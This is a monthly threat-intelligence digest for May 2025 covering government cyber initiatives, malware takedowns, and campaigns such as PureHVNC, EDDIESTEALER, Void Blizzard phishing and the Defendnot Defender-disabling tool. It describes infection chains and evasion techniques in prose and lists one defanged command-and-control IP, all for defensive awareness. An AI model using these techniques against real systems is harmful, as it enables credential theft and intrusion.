Cyware Monthly Threat Intelligence, May 2025
The Good
Governments and institutions worldwide are stepping up efforts to strengthen cyber resilience through innovation and collaboration. NIST has introduced a new metric—Likely Exploited Vulnerabilities (LEV)—to enhance vulnerability risk assessments by offering detailed exploitation data alongside EPSS scores. In the U.K., the Ministry of Defence has launched a Cyber and Electromagnetic Command backed by a £1 billion investment to bolster digital warfare capabilities. Meanwhile, cybersecurity agencies from the U.S., U.K., Australia, Canada, and others have issued a joint advisory promoting the adoption of SIEM and SOAR platforms to improve threat detection, streamline response, and address operational challenges.
NIST introduced a new metric called Likely Exploited Vulnerabilities (LEV) to assess the likelihood of vulnerability exploitation, complementing the existing Exploit Prediction Scoring System (EPSS). LEV provides detailed data for vulnerability managers, including CVE name, publish date, description, probability of past exploitation, peak EPSS scores, and affected products. Two versions of the LEV equation are presented: one using EPSS scores for 30-day windows and another dividing EPSS scores for single-day predictions, requiring more computational resources.
The U.K Ministry of Defence has established a new Cyber and Electromagnetic Command, backed by a £1 billion investment to enhance digital warfare capabilities. This command will defend military networks and coordinate offensive operations with the National Cyber Force. A key initiative is the development of a Digital Targeting Web, aimed at connecting weapons systems through AI for improved communication and rapid response. The move responds to rising cyber threats, with the U.K experiencing 90,000 cyber-attacks in the past two years, prompting accelerated recruitment of cybersecurity specialists.
Governments in the U.S., the U.K, Australia, Canada, and others have issued a joint advisory urging organizations to adopt SIEM and SOAR platforms. These systems centralize cybersecurity data for effective incident detection and response. The advisory provides guidance for both executives and practitioners, addressing challenges like alert fatigue and significant implementation costs. Organizations managing sensitive data should consider in-house deployment, while those outsourcing must carefully evaluate service providers, particularly regarding hidden costs related to data ingestion.
A major Europol-coordinated operation, part of Operation Endgame, dismantled initial access malware used in ransomware attacks, targeting strains like Bumblebee, DanaBot, QakBot, and TrickBot. Authorities seized 300 servers, 650 domains, and €3.5 million ($3.9 million) in cryptocurrency, issuing international arrest warrants for 20 individuals involved in ransomware operations. U.S. authorities issued federal indictments against individuals linked to QakBot and DanaBot malware, including 16 Russians and a lead developer from Moscow.
Microsoft, alongside global law enforcement and cybersecurity partners, has dismantled the Lumma Stealer network, responsible for widespread credential theft, financial fraud, and ransomware attacks. Over 2,300 domains linked to nearly 400,000 infections were seized, disrupting the malware's operations. Legal actions included redirecting malicious domains to Microsoft-controlled servers for intelligence gathering.
Smart heat pumps in the U.K are now subject to new cybersecurity rules under the Smart Secure Electricity Systems Programme. These rules require compliance with the ETSI EN 303 645 standard, ensuring better protection for consumers, their data, and the national grid. The regulations apply to heat pumps with a capacity of up to 45 kW and aim to address risks such as cyberattacks and grid instability. Manufacturers must prepare for these changes by adopting secure-by-design practices and ensuring their devices meet the required standards before enforcement begins in late 2026 or early 2027.
The EU has launched She@Cyber, a free beginner cybersecurity training program targeting women and underrepresented groups to address the cyber skills gap. The program, supported by Erasmus+ and coordinated by Vernian RTI, offers industry-recognized credentials based on ISACA’s Cybersecurity Fundamentals Certificate. SMEs, startups, and microenterprises are encouraged to use the program to find cybersecurity talent.
Europol has successfully dismantled six DDoS-for-hire services used globally for cyberattacks. The operation involved arrests in Poland, seizure of domains in the U.S., and collaboration with Dutch and German authorities as part of Operation PowerOFF. These services, disguised as stress-testing tools, allowed non-technical users to launch DDoS attacks by renting infrastructure.
The UN has introduced the UNIDIR Intrusion Path framework to assess cyber-attacks, complementing existing models like the MITRE ATT&CK framework. The framework simplifies technical language, aiming to help policymakers and non-technical stakeholders better understand malicious IT activities and promote informed cyber diplomacy. It categorizes activities across three network layers: outside the perimeter (external systems like the dark web), on the perimeter (boundary systems like firewalls), and inside the perimeter (internal networks with sensitive data).
The PIVOTT Act (Providing Individuals Various Opportunities for Technical Training to Build a Skills-Based Cyber Workforce Act of 2025) was reintroduced to address the cybersecurity workforce gap, offering scholarships for two-year degrees in exchange for government service. The Act targets entry-level talent and career changers, aiming to prepare professionals for government service, including roles requiring high security clearance.
FBI has published details of 42,000 phishing domains linked to the LabHost phishing-as-a-service operation, which was used by around 10,000 cybercriminals and resulted in significant fraud losses. The domains are released to aid network defenders in building cyber resilience and investigating past breaches. LabHost facilitated the theft of data on 500,000 credit cards and over one million passwords. Organizations are urged to investigate any unusual network activity related to these domains and take preventive measures.
The Bad
A wave of sophisticated cyberattacks continues to target high-profile individuals and organizations, using advanced social engineering and stealthy malware delivery methods. Trellix uncovered a highly targeted spear-phishing campaign impersonating Rothschild & Co recruiters to lure CFOs and finance executives across multiple regions. Another campaign is leveraging fake job offers from fashion and beauty brands to distribute the PureHVNC RAT through a complex infection chain. Meanwhile, Russian threat group Void Blizzard has escalated its attacks on over 20 NGOs in Europe and the U.S., using Evilginx phishing pages, malicious QR codes, and spoofed Microsoft Entra portals.
Trellix discovered a highly targeted spear-phishing operation aimed at CFOs and finance executives in banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, the Middle East, and South Asia. The attackers abused NetBird, an open-source remote-access tool, without exploiting any flaws in the software itself. The phishing emails impersonated Rothschild & Co recruiters, offering fake financial leadership opportunities to lure victims. The phishing link redirects victims to a Firebase-hosted webpage with a custom CAPTCHA, which decrypts a secondary link upon solving the puzzle. The second-stage VBS script installs NetBird and OpenSSH silently, sets up persistence, and removes visible traces of compromise.
The PureHVNC RAT is being distributed through a complex multi-layer infection chain that uses fake high-level job offers from fashion and beauty brands as lures. The attack begins with a malicious LNK file disguised as a PDF, executing PowerShell commands to deliver the malware. Techniques such as obfuscation, base64 encoding, and Process Hollowing are employed to evade detection. The final payload, a .NET-based PureHVNC RAT, provides attackers with full system access. Multiple C2 addresses and campaign IDs are utilized to manage infections, indicating a sophisticated and targeted approach.
Dark Partners, a cybercrime group, has been conducting large-scale cryptocurrency thefts by using fake websites that mimic popular AI, VPN, and crypto tools. These sites deliver malware like Poseidon Stealer (macOS) and Lumma Stealer (Windows) to steal sensitive data, including cryptocurrency wallet information. The group uses anti-sandbox modules, obfuscation, and advanced techniques like retrieving C2 server addresses via Google Calendar links. The malware can exfiltrate data from 76 wallets and desktop applications, with fake download pages designed to target specific operating systems.
A Vietnamese-linked hacking group, UNC6032, has been distributing malware via fake AI video generator websites since mid-2024, using social media ads to lure victims. The campaign involves fake websites mimicking legitimate AI tools like Luma AI and Canva Dream Lab, which deliver malware payloads such as STARKVEIL, XWORM, and FROSTRIFT. Over 30 fake websites have been identified, with ads reaching millions of users primarily on Facebook and LinkedIn. The malicious ads target users globally, rotating domains frequently to avoid detection. The malware payloads are modular and include mechanisms to ensure persistence even if some components are detected or blocked.
Russian hackers, identified as Void Blizzard, have breached over 20 NGOs in Europe and the U.S. using Evilginx phishing via fake Microsoft Entra pages. Active since April 2024, they target organizations linked to Russian government interests, employing stolen credentials purchased from online marketplaces. Their tactics include password spraying, spear-phishing emails, and utilizing tools like AzureHound for reconnaissance. In April 2025, Void Blizzard began using spear phishing campaigns involving fake emails and malicious QR codes to steal login credentials, including spoofing Microsoft Entra authentication portals. Recent attacks involved phishing emails impersonating the European Defense and Security Summit, leading to significant data theft from compromised organizations, including access to Microsoft Teams conversations. The group’s activities overlap with other Russian-affiliated actors, such as Forest Blizzard and Seashell Blizzard, indicating shared intelligence objectives.
Cybercriminals impersonated Kling AI, a popular AI media generation platform, through fake Facebook ads and websites to distribute malware. The malicious campaign uses filename masquerading, where files appear as media files but are actually executables. The malware employs .NET Native AOT compilation to complicate analysis and evade traditional detection methods. The infection chain begins with social media malvertising, directing users to spoofed Kling AI websites. The fake websites prompt users to upload images or generate media, delivering disguised executables in zip archives. The second-stage payload, PureHVNC RAT, includes extensive stealing capabilities targeting browser extensions and cryptocurrency wallets. Vietnamese threat actors are suspected due to references in the code and other indicators like language and phone numbers.
A campaign has been discovered involving over 100 malicious Chrome extensions that impersonate legitimate tools like VPNs and YouTube to steal browser cookies and execute remote scripts. These extensions, promoted through fake domains, request risky permissions to hijack accounts and modify network traffic. Despite Google's removal of many extensions, some remain accessible, posing significant threats to users. The malicious extensions can retrieve and send cookies to remote servers, enabling attackers to breach corporate networks and access sensitive information.
Threat actors have distributed a trojanized version of the KeePass password manager, called KeeLoader, to install Cobalt Strike beacons, steal credentials, and deploy ransomware. The malicious KeePass installer was promoted via Bing advertisements and fake software sites, utilizing modified open-source code. KeeLoader includes functionality to export KeePass database data (including credentials) in cleartext, which is then stolen. Cobalt Strike watermarks in this campaign are linked to an Initial Access Broker associated with Black Basta ransomware attacks. The activity is attributed to UNC4696, a threat actor group previously linked to Nitrogen Loader campaigns and BlackCat/ALPHV ransomware.
The DBatLoader (ModiLoader) malware is being distributed via phishing emails impersonating a Turkish bank, prompting users to open malicious attachments containing BAT files. DBatLoader executes SnakeKeylogger, a .NET-based malware that exfiltrates data through emails, FTP, SMTP, or Telegram. The malware uses obfuscated and decrypted BAT scripts, DLL side-loading, and disguised file names to evade detection and execute malicious activities. It manipulates legitimate processes (e.g., easinvoker.exe, powershell.exe) and tools (cmd.exe, extrac32.exe, etc.) for malicious purposes like bypassing Windows Defender and injecting SnakeKeylogger.
ESET researchers have uncovered Operation RoundPress, a cyberespionage campaign attributed to the Sednit group (aka Fancy Bear, APT28), targeting webmail servers via XSS vulnerabilities. The campaign expanded from targeting Roundcube in 2023 to include Horde, MDaemon, and Zimbra in 2024. Sednit used a zero-day XSS vulnerability (CVE-2024-11182) in MDaemon, which was patched in version 24.5.1. The primary targets are governmental entities and defense companies in Eastern Europe, with additional victims in Africa, Europe, and South America. The attack chain begins with spearphishing emails that exploit XSS vulnerabilities to execute malicious JavaScript payloads. SpyPress payloads (e.g., SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) are used for credential theft, email exfiltration, and bypassing security measures like 2FA.
New Threats
Cybercriminals continue to innovate with new malware strains and delivery techniques designed to bypass detection and maximize data theft. A newly discovered Rust-based infostealer, dubbed EDDIESTEALER, is spreading via fake CAPTCHA verification pages, using obfuscated PowerShell scripts and advanced Rust features. Meanwhile, the Interlock ransomware gang has introduced NodeSnake, a stealthy RAT targeting universities through phishing emails and obfuscated scripts. Additionally, a new campaign is deploying the Remcos RAT using PowerShell-based loaders, malicious LNK files, and mshta.exe to deliver memory-resident malware with capabilities like keylogging, webcam access, and browser credential theft.
A new Rust-based infostealer called EDDIESTEALER has been identified, spreading through fake CAPTCHA verification pages to deceive users into executing malicious PowerShell scripts. The malware uses advanced Rust features, such as memory safety and compiler optimizations, to evade detection and enhance stealth. EDDIESTEALER’s attack chain involves downloading malicious JavaScript and executable files via fake CAPTCHA prompts, targeting sensitive data like credentials, browser information, and cryptocurrency wallets. The malware employs sophisticated obfuscation techniques, including XOR-encrypted strings, custom WinAPI resolution, and self-deletion mechanisms to avoid analysis and detection.
The Interlock ransomware gang has deployed a new RAT named NodeSnake, targeting universities for persistent access to networks. NodeSnake is delivered via phishing emails and utilizes PowerShell or CMD scripts for persistence, creating a deceptive Registry entry. The malware features heavy code obfuscation, randomization of filenames, and cycles through C2 addresses. Once installed, it collects metadata about the user and system, exfiltrating data to the C2, while also allowing the execution of commands and loading additional payloads.
A phishing campaign targeting central and eastern Europe uses copyright infringement lures to distribute Rhadamanthys Stealer. Threat actors exploit DLL side-loading techniques by hijacking the execution flow of a legitimate PDF reader, delivering malicious payloads through emails that impersonate legal departments. These emails accuse recipients of copyright violations, leading to downloads from services like Mediafire. The malware establishes persistence via Windows Registry Run keys and exfiltrates sensitive information. The campaign primarily targets multimedia professionals, leveraging localized language to enhance credibility and engagement.
The Defendnot tool disables Microsoft Defender by spoofing antivirus registration using an undocumented Windows Security Center API. It bypasses system safeguards by injecting its DLL into a trusted process (Taskmgr.exe), allowing it to register a fake antivirus product. Once registered, Microsoft Defender shuts down, leaving the device without active protection. The tool includes configuration options and creates persistence via Windows Task Scheduler.
A new malware campaign utilizes a PowerShell-based loader to deploy the Remcos RAT, employing malicious LNK files and mshta.exe for execution. Delivered via malicious LNK files in ZIP archives, the attack utilizes mshta.exe to run obfuscated VBScript, bypassing Windows Defender. The malware modifies the Windows Registry for persistence, downloads multiple payloads, and executes code directly in memory using Win32 APIs. Remcos features modules for keylogging, webcam access, and credential theft from browsers, employing anti-analysis techniques to evade detection. The latest version includes enhanced functionalities for managing victim machines.
WaterPlum, a North Korea-linked attack group, has been using the OtterCookie malware to target financial institutions and cryptocurrency operators globally. Since its introduction in September 2024, OtterCookie has evolved through multiple versions, with v3 featuring file upload capabilities and Windows support, while v4 adds stealer modules for credentials from Google Chrome, MetaMask, and Brave browser. Differences in coding suggest varying developers for these modules. The group’s activities have been notably observed in Japan, with ongoing updates to the malware.
Chihuahua Stealer is a .NET-based infostealer identified through a deceptive PowerShell script shared via Google Drive. The malware employs a multi-stage payload chain, achieving persistence through scheduled tasks and targeting browser data and crypto wallet extensions. Stolen data is compressed into a ".chihuahua" archive and encrypted using AES-GCM, then exfiltrated over HTTPS while erasing local traces. Its techniques include Base64 encoding, hex-string obfuscation, and dynamic payload retrieval from fallback domains, demonstrating a sophisticated approach to evade detection.
Threat actors are leveraging fake AI tools on Facebook to distribute the Noodlophile malware, targeting over 62,000 users. These tools masquerade as legitimate AI-powered content creation services, tricking users into downloading malicious files. The malware harvests sensitive data, including browser credentials and cryptocurrency information, through a complex infection chain initiated by a deceptive executable.
Russian hackers linked to the COLDRIVER group are deploying a new malware called LOSTKEYS, targeting advisors, journalists, and NGOs, particularly those connected to Ukraine. LOSTKEYS is designed to steal files, system information, and running processes, marking an evolution in COLDRIVER's toolset. The group is also known for credential phishing and hack-and-leak campaigns. The malware is delivered through a multi-stage infection chain starting with a fake CAPTCHA page, known as ClickFix, that socially engineers users into executing PowerShell commands.
The Agenda ransomware group has incorporated SmokeLoader malware and a new loader, NETXLOADER, into its arsenal. NETXLOADER is a highly obfuscated .NET-based loader that deploys additional malware payloads, including Agenda ransomware and SmokeLoader, through advanced techniques like JIT hooking and AES decryption. SmokeLoader incorporates anti-analysis methods and injects payloads into processes like explorer.exe. Agenda ransomware is delivered using reflective DLL loading, allowing it to execute in memory without being written to disk.
The CoGUI phishing kit is actively targeting Japanese organizations, impersonating well-known consumer and finance brands to steal credentials and payment data. CoGUI employs advanced evasion techniques like geofencing, browser fingerprinting, and header fencing to avoid detection, selectively targeting specific regions. High-volume campaigns have been observed, with the majority targeting Japan, and impersonating brands like Amazon, Rakuten, PayPay, and financial institutions. Campaigns often use urgency-based lures and URLs leading to credential phishing pages, stealing usernames, passwords, and payment information.
Arctic Wolf Labs has identified a new campaign by the financially motivated threat group Venom Spider targeting corporate HR departments via spear-phishing emails. The campaign uses fake resumes to deliver a backdoor malware called More_eggs, which has been enhanced with new features for evasion and effectiveness. The malware uses advanced techniques like server-side polymorphism, code obfuscation, and encrypted payloads to evade detection and analysis.The More_eggs_Dropper library generates polymorphic JavaScript payloads and uses time-delayed execution to avoid sandboxing.
Unit 42 has identified Gremlin Stealer, a new info-stealer written in C# and advertised on Telegram since March. It targets sensitive data, including browser cookies, credit card information, cryptocurrency wallets, and credentials from FTP and VPN services. The malware bypasses Chrome's cookie protection and uploads stolen data to a server at 207.244.199[.]46. Gremlin Stealer is actively developed and capable of exfiltrating data from various applications, including Telegram and Discord.
Earth Kasha, an APT group believed to be part of APT10, has launched a new spear-phishing campaign targeting Taiwan and Japan in March. The campaign aims to deliver a new version of the ANEL backdoor for espionage, potentially leading to information theft and compromising sensitive data. The campaign uses a malicious Excel file, ROAMINGMOUSE, to drop ANEL components, and employs SharpHide for persistence. The second-stage backdoor, NOOPDOOR, utilizes DNS over HTTPS for secure IP resolution.